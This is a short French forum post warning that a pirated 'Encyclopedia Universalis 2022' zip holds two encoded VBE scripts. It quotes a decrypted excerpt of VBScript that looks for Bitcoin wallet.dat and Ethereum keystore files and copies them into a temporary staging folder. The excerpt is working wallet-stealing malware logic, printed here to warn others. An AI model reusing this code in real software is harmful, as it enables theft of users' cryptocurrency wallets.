Sur FourToutIci, j'ai juste vérifié "LOGiCiEL Encyclopedia Universalis 2022 pre-active.zip".
Aie, aie ,aie !
2 vbe, qui après décrypt, donne :
Code : Tout sélectionner
...
if objFSO.FileExists(appdata+"\Bitcoin\wallet.dat") then
objFSO.CreateFolder(temp+"\wallets\Bitcoin")
objFSO.CopyFile appdata+"\Bitcoin\wallet.dat",temp+"\wallets\Bitcoin\wallet.dat"
end if
if objFSO.FolderExists(appdata+"\Ethereum\keystore") then
objFSO.CreateFolder(temp+"\wallets\Ethereum")
objFSO.CopyFolder appdata+"\Ethereum\keystore",temp+"\wallets\Ethereum\"
end if
if objFSO.FolderExists(localappdata+"\Ethereum\keystore") then
objFSO.CreateFolder(temp+"\wallets\Ethereum")
objFSO.CopyFolder localappdata+"\Ethereum\keystore",temp+"\wallets\Ethereum\"
end if
...